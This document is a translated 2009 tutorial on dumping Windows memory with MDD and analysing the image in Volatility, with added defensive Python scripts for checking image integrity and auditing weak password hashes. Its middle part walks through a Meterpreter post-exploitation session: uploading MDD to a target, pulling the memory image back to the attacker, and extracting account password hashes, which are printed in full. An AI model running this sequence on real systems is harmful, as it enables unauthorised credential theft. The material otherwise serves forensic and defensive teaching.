
Analysing data-security risks in Windows system memory


ManTech MDD (http://www.mantech.com/msma/MDD.asp) is released under the GPL. MDD can copy the entire contents of memory on the following Microsoft operating systems: Windows 2000, Windows XP, Windows 2003 Server and Windows 2008 Server.

Source: 中国IT实验室 (China IT Lab), 12 August 2009

Keywords: data security, system security, Windows


  After downloading MDD from the ManTech site, you must run it from the command line.

  MDD command-line usage:

    mdd -o <output file name>

  For example:

    C:\tools\mdd> mdd -o memory.dd
    -> mdd
    -> ManTech Physical Memory Dump Utility
    Copyright (C) 2008 ManTech Security & Mission Assurance
    -> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
    This is free software, and you are welcome to redistribute it
    under certain conditions; use option `-c' for details.
    -> Dumping 255.48 MB of physical memory to file 'memory.dd'.
    65404 map operations succeeded (1.00)
    0 map operations failed
    took 21 seconds to write
    MD5 is: a48986bb0558498684414e9399ca19fc

  The output file is a raw image of physical memory. MDD does nothing more than copy that memory, so other tools must be used to analyse the image.
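  The MD5 that MDD prints at the end of a run is the only record of what was acquired, so before an image is analysed it is worth checking that the file on disk still matches that record. The following Python script is an added example and is not part of the original article or of ManTech's MDD. It parses the console output shown above, derives the expected image size from the page count (assuming, as the article's own figures suggest, that each map operation covers one 4 KiB page: 65404 × 4096 bytes = 255.48 MB), and compares the size and MD5 of an image file against the record. The sample console text and the small image the demo builds are constructed.

```python
"""Integrity check for a memory image acquired with MDD.

Added example; not code from the original article or from ManTech.
It parses the console output that mdd prints, then checks an image
file on disk against that record before any analysis is done on it.
Assumption: one map operation covers one 4 KiB page, which is
consistent with the article's figures (65404 * 4096 bytes = 255.48 MB).
"""
import hashlib
import os
import re
import tempfile

PAGE_SIZE = 4096  # assumed size of one map operation (4 KiB page)

# Constructed sample: the console output from the article's first mdd run.
SAMPLE_MDD_OUTPUT = """\
-> mdd
-> ManTech Physical Memory Dump Utility
Copyright (C) 2008 ManTech Security & Mission Assurance
-> Dumping 255.48 MB of physical memory to file 'memory.dd'.
65404 map operations succeeded (1.00)
0 map operations failed
took 21 seconds to write
MD5 is: a48986bb0558498684414e9399ca19fc
"""


def parse_mdd_output(text):
    """Extract the acquisition record mdd prints: file name, size, page counts, MD5."""
    rec = {}
    m = re.search(r"Dumping ([\d.]+) MB of physical memory to file '([^']+)'", text)
    if m:
        rec["reported_mb"] = float(m.group(1))
        rec["file"] = m.group(2)
    m = re.search(r"(\d+) map operations succeeded", text)
    if m:
        rec["pages_ok"] = int(m.group(1))
    m = re.search(r"(\d+) map operations failed", text)
    if m:
        rec["pages_failed"] = int(m.group(1))
    m = re.search(r"MD5 is: ([0-9a-fA-F]{32})", text)
    if m:
        rec["md5"] = m.group(1).lower()
    return rec


def expected_image_bytes(rec):
    """Image size implied by the page count (assumes PAGE_SIZE per map operation)."""
    return rec["pages_ok"] * PAGE_SIZE


def md5_of_file(path, chunk=1 << 20):
    """Hash a large image without reading it into memory at once."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def verify_image(path, rec):
    """Return a list of findings; an empty list means the file matches the record."""
    findings = []
    size = os.path.getsize(path)
    want = expected_image_bytes(rec)
    if size != want:
        findings.append("size is %d bytes, expected %d" % (size, want))
    if rec.get("pages_failed", 0):
        findings.append("%d pages were not mapped; the image has gaps" % rec["pages_failed"])
    actual = md5_of_file(path)
    if actual != rec["md5"]:
        findings.append("MD5 %s does not match recorded %s" % (actual, rec["md5"]))
    return findings


def demo():
    """Self-contained run on a constructed 3-page image, before and after a 1-byte change."""
    data = bytes(range(256)) * (3 * PAGE_SIZE // 256)  # deterministic, 3 pages long
    rec = {"pages_ok": 3, "pages_failed": 0, "md5": hashlib.md5(data).hexdigest()}
    with tempfile.NamedTemporaryFile(delete=False) as f:
        f.write(data)
        path = f.name
    try:
        clean = verify_image(path, rec)
        with open(path, "r+b") as f:
            f.write(b"\xff")  # first byte was 0x00; simulate a modified image
        tampered = verify_image(path, rec)
    finally:
        os.unlink(path)
    return clean, tampered


if __name__ == "__main__":
    print(parse_mdd_output(SAMPLE_MDD_OUTPUT))
    print(demo())
```

  A non-zero "map operations failed" count is reported as a finding of its own, because the image then has unmapped regions and any analysis result from those regions is suspect; the page-size assumption should be confirmed against the size of a real image before the size check is relied on.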

  Here we use Metasploit Meterpreter together with MDD to carry out the following steps.

  First, upload MDD to the target.

    meterpreter > upload /root/mdd.exe .
    [*] uploading : /root/mdd.exe -> .
    [*] uploaded : /root/mdd.exe -> .\mdd.exe
    meterpreter > ls

    Listing: c:\
    ============

    Mode               Size       Type  Last modified                   Name
    ----               ----       ----  -------------                   ----
    100777 /rwxrwxrwx  0          fil   Thu Jan 01 00:00:00 +0000 1970  AUTOEXEC.BAT
    100666 /rw-rw-rw-  0          fil   Thu Jan 01 00:00:00 +0000 1970  CONFIG.SYS
    40777 /rwxrwxrwx   0          dir   Thu Jan 01 00:00:00 +0000 1970  Documents and Settings
    100444 /r--r--r--  0          fil   Thu Jan 01 00:00:00 +0000 1970  IO.SYS
    100444 /r--r--r--  0          fil   Thu Jan 01 00:00:00 +0000 1970  MSDOS.SYS
    100555 /r-xr-xr-x  45124      fil   Thu Jan 01 00:00:00 +0000 1970  NTDETECT.COM
    40555 /r-xr-xr-x   0          dir   Thu Jan 01 00:00:00 +0000 1970  Program Files
    40777 /rwxrwxrwx   0          dir   Thu Jan 01 00:00:00 +0000 1970  System Volume Information
    40777 /rwxrwxrwx   0          dir   Thu Jan 01 00:00:00 +0000 1970  WINDOWS
    100666 /rw-rw-rw-  194        fil   Thu Jan 01 00:00:00 +0000 1970  boot.ini
    100777 /rwxrwxrwx  95104      fil   Thu Jan 01 00:00:00 +0000 1970  mdd.exe
    100444 /r--r--r--  222368     fil   Thu Jan 01 00:00:00 +0000 1970  ntldr
    100666 /rw-rw-rw-  402653184  fil   Thu Jan 01 00:00:00 +0000 1970  pagefile.sys

  Run MDD on the target machine to capture the contents of RAM.

    meterpreter > execute -f "cmd.exe" -i -H
    Process 1908 created.
    Channel 2 created.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    c:\> mdd.exe -o memory.dd
    mdd.exe -o memory.dd
    -> mdd
    -> ManTech Physical Memory Dump Utility
    Copyright (C) 2008 ManTech Security & Mission Assurance
    -> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
    This is free software, and you are welcome to redistribute it
    under certain conditions; use option `-c' for details.
    -> Dumping 511.48 MB of physical memory to file 'memory.dd'.
    130940 map operations succeeded (1.00)
    0 map operations failed
    took 23 seconds to write
    MD5 is: be9d1d906fac99fa01782e847a1c3144

  Here we simply run the tool, with no further effort, and the data we need is captured.

    meterpreter > execute -f mdd.exe -a "-o demo.dd"
    Process 3436 created.

  We need to confirm that the memory image has been captured.

    meterpreter > ls

    Listing: C:\
    ============

    Mode              Size       Type  Last modified                   Name
    ----              ----       ----  -------------                   ----
    100666/rw-rw-rw-  537604934  fil   Wed Dec 31 19:00:00 -0500 1969  92010NT_Disk2.zip
    100777/rwxrwxrwx  0          fil   Wed Dec 31 19:00:00 -0500 1969  AUTOEXEC.BAT
    100666/rw-rw-rw-  0          fil   Wed Dec 31 19:00:00 -0500 1969  CONFIG.SYS
    40777/rwxrwxrwx   0          dir   Wed Dec 31 19:00:00 -0500 1969  Config.Msi
    40777/rwxrwxrwx   0          dir   Wed Dec 31 19:00:00 -0500 1969  Documents and Settings
    40777/rwxrwxrwx   0          dir   Wed Dec 31 19:00:00 -0500 1969  GetAd2
    100666/rw-rw-rw-  15642      fil   Wed Dec 31 19:00:00 -0500 1969  GetAd2.zip
    100444/r--r--r--  0          fil   Wed Dec 31 19:00:00 -0500 1969  IO.SYS
    40777/rwxrwxrwx   0          dir   Wed Dec 31 19:00:00 -0500 1969  Inetpub
    100444/r--r--r--  0          fil   Wed Dec 31 19:00:00 -0500 1969  MSDOS.SYS
    100555/r-xr-xr-x  47580      fil   Wed Dec 31 19:00:00 -0500 1969  NTDETECT.COM
    40777/rwxrwxrwx   0          dir   Wed Dec 31 19:00:00 -0500 1969  PortQryV2
    40555/r-xr-xr-x   0          dir   Wed Dec 31 19:00:00 -0500 1969  Program Files
    40777/rwxrwxrwx   0          dir   Wed Dec 31 19:00:00 -0500 1969  RECYCLER
    40777/rwxrwxrwx   0          dir   Wed Dec 31 19:00:00 -0500 1969  System Volume Information
    40777/rwxrwxrwx   0          dir   Wed Dec 31 19:00:00 -0500 1969  WINDOWS
    100666/rw-rw-rw-  146        fil   Wed Dec 31 19:00:00 -0500 1969  YServer.txt
    100666/rw-rw-rw-  194        fil   Wed Dec 31 19:00:00 -0500 1969  boot.ini
    100666/rw-rw-rw-  133677056  fil   Wed Dec 31 19:00:00 -0500 1969  demo.dd
    100777/rwxrwxrwx  95104      fil   Wed Dec 31 19:00:00 -0500 1969  mdd.exe
    100444/r--r--r--  233632     fil   Wed Dec 31 19:00:00 -0500 1969  ntldr
    100666/rw-rw-rw-  402653184  fil   Wed Dec 31 19:00:00 -0500 1969  pagefile.sys
    40777/rwxrwxrwx   0          dir   Wed Dec 31 19:00:00 -0500 1969  passwordcrackers
    40777/rwxrwxrwx   0          dir   Wed Dec 31 19:00:00 -0500 1969  share
    100777/rwxrwxrwx  869        fil   Wed Dec 31 19:00:00 -0500 1969  update.exe

  Download the memory dump using Meterpreter.

    meterpreter > download memory.dd .
    [*] downloading: memory.dd -> .
    [*] downloaded : memory.dd -> ./demo.dd
    meterpreter >

  We now have a local copy of the .dd image and can follow the steps given at http://forensiczone.blogspot.com/2009/01/using-volatility-1.html to extract sensitive information from memory.

  Appendix:

  Volatility (https://www.volatilesystems.com/default/volatility)

    $ python volatility
    Volatile Systems Volatility Framework v1.3
    Copyright (C) 2007,2008 Volatile Systems
    Copyright (C) 2007 Komoku, Inc.
    This is free software; see the source for copying conditions.
    There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

    usage: volatility cmd [cmd_opts]

    Run command cmd with options cmd_opts
    For help on a specific command, run 'volatility cmd --help'

    Supported Internel Commands:
        connections     Print list of open connections
        connscan        Scan for connection objects
        connscan2       Scan for connection objects (New)
        datetime        Get date/time information for image
        dlllist         Print list of loaded dlls for each process
        dmp2raw         Convert a crash dump to a raw dump
        dmpchk          Dump crash dump information
        files           Print list of open files for each process
        hibinfo         Convert hibernation file to linear raw image
        ident           Identify image properties
        memdmp          Dump the addressable memory for a process
        memmap          Print the memory map
        modscan         Scan for modules
        modscan2        Scan for module objects (New)
        modules         Print list of loaded modules
        procdump        Dump a process to an executable sample
        pslist          Print list of running processes
        psscan          Scan for EPROCESS objects
        psscan2         Scan for process objects (New)
        raw2dmp         Convert a raw dump to a crash dump
        regobjkeys      Print list of open regkeys for each process
        sockets         Print list of open sockets
        sockscan        Scan for socket objects
        sockscan2       Scan for socket objects (New)
        strings         Match physical offsets to virtual addresses (may take a while, VERY verbose)
        thrdscan        Scan for ETHREAD objects
        thrdscan2       Scan for thread objects (New)
        vaddump         Dump the Vad sections to files
        vadinfo         Dump the VAD info
        vadwalk         Walk the vad tree

    Supported Plugin Commands:
        cachedump       Dump (decrypted) domain hashes from the registry
        hashdump        Dump (decrypted) LM and NT hashes from the registry
        hivelist        Print list of registry hives
        hivescan        Scan for _CMHIVE objects (registry hives)
        lsadump         Dump (decrypted) LSA secrets from the registry
        memmap_ex_2     Print the memory map
        printkey        Print a registry key, and its subkeys and values
        pslist_ex_1     Print list running processes
        pslist_ex_3     Print list running processes
        usrdmp_ex_2     Dump the address space for a process

    Example: volatility pslist -f /path/to/my/file

  1. Run hivescan to obtain the required offsets

    $ python volatility hivescan -f demo.dd
    Offset      (hex)
    42168328    0x2837008
    42195808    0x283db60
    47598392    0x2d64b38
    155764592   0x948c770
    155973608   0x94bf7e8
    208587616   0xc6ecb60
    208964448   0xc748b60
    234838880   0xdff5b60
    243852936   0xe88e688
    251418760   0xefc5888
    252887048   0xf12c008
    256039736   0xf42db38
    269699936   0x10134b60
    339523208   0x143cb688
    346659680   0x14a99b60
    377572192   0x16814b60
    387192184   0x17141578
    509150856   0x1e590688
    521194336   0x1f10cb60
    523667592   0x1f368888
    527756088   0x1f74eb38

  2. Run hivelist, passing the first offset found by hivescan

    $ python volatility hivelist -f demo.dd -o 0x2837008
    Address     Name
    0xe2610b60  \Documents and Settings\Sarah\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
    0xe25f0578  \Documents and Settings\Sarah\NTUSER.DAT
    0xe1d33008  \Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
    0xe1c73888  \Documents and Settings\LocalService\NTUSER.DAT
    0xe1c04688  \Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
    0xe1b70b60  \Documents and Settings\NetworkService\NTUSER.DAT
    0xe1658b60  \WINDOWS\system32\config\software
    0xe1a5a7e8  \WINDOWS\system32\config\default
    0xe165cb60  \WINDOWS\system32\config\SAM
    0xe1a4f770  \WINDOWS\system32\config\SECURITY
    0xe1559b38  [no name]
    0xe1035b60  \WINDOWS\system32\config\system
    0xe102e008  [no name]

  3. Dump the password hashes (-y: system hive offset, -s: SAM hive offset, both taken from the hivelist output)

    $ python volatility hashdump -f demo.dd -y 0xe1035b60 -s 0xe165cb60
    Administrator:500:08f3a52bdd35f179c81667e9d738c5d9:ed88cccbc08d1c18bcded317112555f4:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    HelpAssistant:1000:ddd4c9c883a8ecb2078f88d729ba2e67:e78d693bc40f92a534197dc1d3a6d34f:::
    SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:8bfd47482583168a0ae5ab020e1186a9:::
    phoenix:1003:07b8418e83fad948aad3b435b51404ee:53905140b80b6d8cbe1ab5953f7c1c51:::
    ASPNET:1004:2b5f618079400df84f9346ce3e830467:aef73a8bb65a0f01d9470fadc55a411c:::
    Sarah:1006:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
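  The hashdump listing above is in pwdump format (user:RID:LM hash:NT hash:::). The following Python script is an added example and is not part of the original article or of Volatility. It parses such a listing and flags the conditions an administrator would act on, using the well-known hashes of the empty password (LM aad3b435b51404eeaad3b435b51404ee, NT 31d6cfe0d16ae931b73c59d7e0c089c0): an account with a blank password, an account whose LM hash is still stored (the NoLMHash policy is not in effect), and an LM hash whose second half is the empty block, which means the password is seven characters or shorter. The listing embedded as input is the one shown above.

```python
"""Audit of a Volatility hashdump listing for weak credential storage.

Added example; not code from the original article or from Volatility.
It reads pwdump-format lines (user:rid:lm_hash:nt_hash:::) and reports,
per account, the conditions an administrator acts on.
"""
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
EMPTY_LM_HALF = EMPTY_LM[16:]                 # LM hash of one empty 7-character half

# Constructed sample: the listing from the article's hashdump step.
SAMPLE_HASHDUMP = """\
Administrator:500:08f3a52bdd35f179c81667e9d738c5d9:ed88cccbc08d1c18bcded317112555f4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:ddd4c9c883a8ecb2078f88d729ba2e67:e78d693bc40f92a534197dc1d3a6d34f:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:8bfd47482583168a0ae5ab020e1186a9:::
phoenix:1003:07b8418e83fad948aad3b435b51404ee:53905140b80b6d8cbe1ab5953f7c1c51:::
ASPNET:1004:2b5f618079400df84f9346ce3e830467:aef73a8bb65a0f01d9470fadc55a411c:::
Sarah:1006:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""


def parse_pwdump(text):
    """Parse user:rid:lm:nt::: lines; blank or malformed lines are skipped."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        entries.append({"user": parts[0], "rid": int(parts[1]),
                        "lm": parts[2].lower(), "nt": parts[3].lower()})
    return entries


def audit_entry(e):
    """Findings for one account, in a fixed order."""
    findings = []
    if e["nt"] == EMPTY_NT:
        findings.append("blank password")
    if e["lm"] != EMPTY_LM:
        # An LM hash is only stored when NoLMHash is off and the password
        # is at most 14 characters; it is the weak half of the pair.
        findings.append("LM hash stored (NoLMHash not enforced)")
        if e["lm"].endswith(EMPTY_LM_HALF):
            # The second 7-character block is empty: the password is 7 chars or shorter.
            findings.append("password is 7 characters or fewer")
    return findings


def audit_hashdump(text):
    """Map each account name to its findings; accounts with none are omitted.

    pwdump lines carry no account status, so a flagged account (Guest, for
    instance) may already be disabled; that has to be checked separately.
    """
    report = {}
    for e in parse_pwdump(text):
        f = audit_entry(e)
        if f:
            report[e["user"]] = f
    return report


if __name__ == "__main__":
    for user, findings in audit_hashdump(SAMPLE_HASHDUMP).items():
        print("%-18s %s" % (user, "; ".join(findings)))
```

  Run against the listing above, the script reports Sarah and Guest as blank-password accounts, four accounts (Administrator, HelpAssistant, phoenix, ASPNET) with an LM hash still stored, and phoenix as having a password of at most seven characters; SUPPORT_388945a0 produces no finding because only its NT hash is stored. The mitigations the findings point at are the NoLMHash policy, a minimum password length above seven characters, and disabling or giving a password to any enabled account that has none.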
